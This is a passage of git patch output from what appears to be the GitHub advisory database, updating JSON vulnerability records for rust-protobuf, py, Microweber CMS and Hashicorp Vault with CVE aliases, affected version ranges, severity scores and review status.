"1.4.0", "id": "GHSA-2gh3-rmm4-6rq5", - "modified": "2025-03-11T17:08:07Z", + "modified": "2025-08-01T19:20:19Z", "published": "2025-03-07T20:02:37Z", - "aliases": [], + "aliases": [ + "CVE-2025-53605" + ], "summary": "Crash due to uncontrolled recursion in protobuf crate", "details": "Affected version of this crate did not properly parse unknown fields when parsing a user-supplied input.\n\nThis allows an attacker to cause a stack overflow when parsing the message on untrusted data.", "severity": [ @@ -34,6 +36,10 @@ } ], "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53605" + }, { "type": "WEB", "url": "https://github.com/stepancheg/rust-protobuf/issues/749" From 59261b7cddedf67f370557e598ddeb501054194c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 20:35:59 +0000 Subject: [PATCH 304/323] Publish GHSA-w596-4wvx-j9j6 --- .../2022/10/GHSA-w596-4wvx-j9j6/GHSA-w596-4wvx-j9j6.json | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2022/10/GHSA-w596-4wvx-j9j6/GHSA-w596-4wvx-j9j6.json b/advisories/github-reviewed/2022/10/GHSA-w596-4wvx-j9j6/GHSA-w596-4wvx-j9j6.json index 214a373ff1cfd..3a7f7640ffdfd 100644 --- a/advisories/github-reviewed/2022/10/GHSA-w596-4wvx-j9j6/GHSA-w596-4wvx-j9j6.json +++ b/advisories/github-reviewed/2022/10/GHSA-w596-4wvx-j9j6/GHSA-w596-4wvx-j9j6.json @@ -1,13 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-w596-4wvx-j9j6", - "modified": "2025-05-14T19:24:41Z", + "modified": "2025-08-01T20:34:12Z", "published": "2022-10-16T12:00:23Z", + "withdrawn": "2025-08-01T20:34:11Z", "aliases": [ "CVE-2022-42969" ], - "summary": "ReDoS in py library when used with subversion ", - "details": "The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.\n\nThe particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.", + "summary": "Withdrawn Advisory: ReDoS in py library when used with subversion ", + "details": "### Withdrawn Advisory\nThis advisory has been withdrawn because evidence does not suggest that CVE-2022-42969 is a valid, reproducible vulnerability. This link is maintained to preserve external references.\n\n### Original Description\nThe py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.\n\nThe particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.", "severity": [ { "type": "CVSS_V3", From 7fe7b7865fed2166b669daee6fccec64290cf0cc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 21:08:01 +0000 Subject: [PATCH 305/323] Publish Advisories GHSA-2x2j-3c2v-g3c2 GHSA-8357-fjvx-xrm8 GHSA-mvj3-hc7j-vp74 GHSA-2x2j-3c2v-g3c2 --- .../GHSA-2x2j-3c2v-g3c2.json | 69 +++++++++++++++++++ .../GHSA-8357-fjvx-xrm8.json | 33 +++++++-- .../GHSA-mvj3-hc7j-vp74.json | 33 +++++++-- .../GHSA-2x2j-3c2v-g3c2.json | 44 ------------ 4 files changed, 127 insertions(+), 52 deletions(-) create mode 100644 advisories/github-reviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json (61%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json (62%) delete mode 100644 advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json diff --git a/advisories/github-reviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json b/advisories/github-reviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json new file mode 100644 index 0000000000000..f7ee24d1424b0 --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x2j-3c2v-g3c2", + "modified": "2025-08-01T21:06:51Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-51504" + ], + "summary": "Microweber XSS Vulnerability in the homepage Endpoint ", + "details": "Microweber CMS 2.0 is vulnerable to Cross Site Scripting (XSS) in the /projects/profile, homepage endpoint via the last name field.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "microweber/microweber" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "last_affected": "2.0.19" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51504" + }, + { + "type": "PACKAGE", + "url": "https://github.com/microweber/microweber" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51504" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BLive%20Panel%5D%20Stored%20XSS%20in%20profile%20path.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:06:51Z", + "nvd_published_at": "2025-08-01T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json b/advisories/github-reviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json similarity index 61% rename from advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json rename to advisories/github-reviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json index 2434332e9361a..d281df5f3176a 100644 --- a/advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json +++ b/advisories/github-reviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-8357-fjvx-xrm8", - "modified": "2025-08-01T18:31:18Z", + "modified": "2025-08-01T21:06:23Z", "published": "2025-08-01T18:31:18Z", "aliases": [ "CVE-2025-51501" ], + "summary": "Microweber has Reflected XSS Vulnerability in the id Parameter", "details": "Reflected Cross-Site Scripting (XSS) in the id parameter of the live_edit.module_settings API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "microweber/microweber" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "last_affected": "2.0.19" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51501" }, + { + "type": "PACKAGE", + "url": "https://github.com/microweber/microweber" + }, { "type": "WEB", "url": "https://github.com/progprnv/CVE-Reports" @@ -37,8 +62,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:06:23Z", "nvd_published_at": "2025-08-01T17:15:52Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json b/advisories/github-reviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json similarity index 62% rename from advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json rename to advisories/github-reviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json index 21440848ba900..b29353dc48f30 100644 --- a/advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json +++ b/advisories/github-reviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-mvj3-hc7j-vp74", - "modified": "2025-08-01T18:31:18Z", + "modified": "2025-08-01T21:06:43Z", "published": "2025-08-01T18:31:18Z", "aliases": [ "CVE-2025-51502" ], + "summary": "Microweber has Reflected XSS Vulnerability in the layout Parameter", "details": "Reflected Cross-Site Scripting (XSS) in Microweber CMS 2.0 via the layout parameter on the /admin/page/create page allows arbitrary JavaScript execution in the context of authenticated admin users.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "microweber/microweber" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "last_affected": "2.0.19" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51502" }, + { + "type": "PACKAGE", + "url": "https://github.com/microweber/microweber" + }, { "type": "WEB", "url": "https://github.com/progprnv/CVE-Reports" @@ -37,8 +62,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:06:43Z", "nvd_published_at": "2025-08-01T17:15:52Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json b/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json deleted file mode 100644 index c94437cbf4848..0000000000000 --- a/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json +++ /dev/null @@ -1,44 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2x2j-3c2v-g3c2", - "modified": "2025-08-01T18:31:18Z", - "published": "2025-08-01T18:31:18Z", - "aliases": [ - "CVE-2025-51504" - ], - "details": "Microweber CMS 2.0 is vulnerable to Cross Site Scripting (XSS)in the /projects/profile, homepage endpoint via the last name field.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51504" - }, - { - "type": "WEB", - "url": "https://github.com/progprnv/CVE-Reports" - }, - { - "type": "WEB", - "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51504" - }, - { - "type": "WEB", - "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BLive%20Panel%5D%20Stored%20XSS%20in%20profile%20path.md" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-08-01T17:15:52Z" - } -} \ No newline at end of file From 6c643418d1e436c22f4ee266a7f013bb47604c5b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 21:10:20 +0000 Subject: [PATCH 306/323] Publish Advisories GHSA-6c5r-4wfc-3mcx GHSA-6h4p-m86h-hhgh GHSA-mr4h-qf9j-f665 GHSA-mwgr-84fv-3jh9 GHSA-qgj7-fmq2-6cc4 GHSA-qv3p-fmv3-9hww GHSA-v6r4-35f9-9rpw --- .../GHSA-6c5r-4wfc-3mcx.json | 33 ++++++++++++++++--- .../GHSA-6h4p-m86h-hhgh.json | 33 ++++++++++++++++--- .../GHSA-mr4h-qf9j-f665.json | 33 ++++++++++++++++--- .../GHSA-mwgr-84fv-3jh9.json | 33 ++++++++++++++++--- .../GHSA-qgj7-fmq2-6cc4.json | 33 ++++++++++++++++--- .../GHSA-qv3p-fmv3-9hww.json | 33 ++++++++++++++++--- .../GHSA-v6r4-35f9-9rpw.json | 33 ++++++++++++++++--- 7 files changed, 203 insertions(+), 28 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json (65%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json (60%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json (60%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json (60%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json (58%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json (58%) rename advisories/{unreviewed => github-reviewed}/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json (58%) diff --git a/advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json b/advisories/github-reviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json similarity index 65% rename from advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json rename to advisories/github-reviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json index dec6b605c68a5..8a75d1b7cb779 100644 --- a/advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json +++ b/advisories/github-reviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-6c5r-4wfc-3mcx", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:09:19Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6037" ], + "summary": "Hashicorp Vault has Incorrect Validation for Non-CA Certificates", "details": "Vault and Vault Enterprise (“Vault”) TLS certificate auth method did not correctly validate client certificates when configured with a non-CA certificate as [+trusted certificate+|https://developer.hashicorp.com/vault/api-docs/auth/cert#certificate]. In this configuration, an attacker may be able to craft a malicious certificate that could be used to impersonate another user. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-18-vault-certificate-auth-method-did-not-validate-common-name-for-non-ca-certificates/76037" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-295" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:09:19Z", "nvd_published_at": "2025-08-01T18:15:57Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json b/advisories/github-reviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json similarity index 60% rename from advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json rename to advisories/github-reviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json index 8cb8685f380d8..6e4d69f5afd9c 100644 --- a/advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json +++ b/advisories/github-reviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-6h4p-m86h-hhgh", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:08:01Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-5999" ], + "summary": "Hashicorp Vault has Privilege Escalation Vulnerability", "details": "A privileged Vault operator with write permissions to the root namespace’s identity endpoint could escalate their own or another user’s token privileges to Vault’s root policy. Fixed in Vault Community Edition 1.20.0 and Vault Enterprise 1.20.0, 1.19.6, 1.18.11 and 1.16.22.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.10.4" + }, + { + "fixed": "1.20.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-266" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:08:00Z", "nvd_published_at": "2025-08-01T18:15:56Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json b/advisories/github-reviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json similarity index 60% rename from advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json rename to advisories/github-reviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json index a972b0227cabe..e9bc831736785 100644 --- a/advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json +++ b/advisories/github-reviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-mr4h-qf9j-f665", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:07:41Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6000" ], + "summary": "Hashicorp Vault has Code Execution Vulnerability via Plugin Configuration", "details": "A privileged Vault operator within the root namespace with write permission to {{sys/audit}} may obtain code execution on the underlying host if a plugin directory is set in Vault’s configuration. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-14-privileged-vault-operator-may-execute-code-on-the-underlying-host/76033" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-94" ], "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:07:41Z", "nvd_published_at": "2025-08-01T18:15:56Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json b/advisories/github-reviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json similarity index 60% rename from advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json rename to advisories/github-reviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json index dca3846f77a78..b9b885f3a232a 100644 --- a/advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json +++ b/advisories/github-reviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-mwgr-84fv-3jh9", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:08:42Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6011" ], + "summary": "Hashicorp Vault has an Observable Discrepancy on Existing and Non-Existing Users", "details": "A timing side channel in Vault and Vault Enterprise’s (“Vault”) userpass auth method allowed an attacker to distinguish between existing and non-existing users, and potentially enumerate valid usernames for Vault’s Userpass auth method. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-15-timing-side-channel-in-vault-s-userpass-auth-method/76034" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-203" ], "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:08:42Z", "nvd_published_at": "2025-08-01T18:15:56Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json b/advisories/github-reviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json similarity index 58% rename from advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json rename to advisories/github-reviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json index 9fd68224f40e8..eb87eac6aec3a 100644 --- a/advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json +++ b/advisories/github-reviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-qgj7-fmq2-6cc4", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:08:19Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6004" ], + "summary": "Hashicorp Vault has Lockout Feature Authentication Bypass", "details": "Vault and Vault Enterprise’s (“Vault”) user lockout feature could be bypassed for Userpass and LDAP authentication methods. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.13.0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-16-vault-userpass-and-ldap-user-lockout-bypass/76035" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-307" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:08:19Z", "nvd_published_at": "2025-08-01T18:15:56Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json b/advisories/github-reviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json similarity index 58% rename from advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json rename to advisories/github-reviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json index 33e4651184b3f..73a3ea90a9928 100644 --- a/advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json +++ b/advisories/github-reviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-qv3p-fmv3-9hww", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:08:57Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6014" ], + "summary": "Hashicorp Vault's TOTP Secrets Engine Susceptible to Code Reuse ", "details": "Vault and Vault Enterprise’s (“Vault”) TOTP Secrets Engine code validation endpoint is susceptible to code reuse within its validity period. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-17-vault-totp-secrets-engine-code-reuse/76036" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-156" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:08:57Z", "nvd_published_at": "2025-08-01T18:15:56Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json b/advisories/github-reviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json similarity index 58% rename from advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json rename to advisories/github-reviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json index f7e8ba84d6452..76e7d60ab8f80 100644 --- a/advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json +++ b/advisories/github-reviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-v6r4-35f9-9rpw", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:09:08Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-6015" ], + "summary": "Hashicorp Vault has Login MFA Rate Limit Bypass Vulnerability", "details": 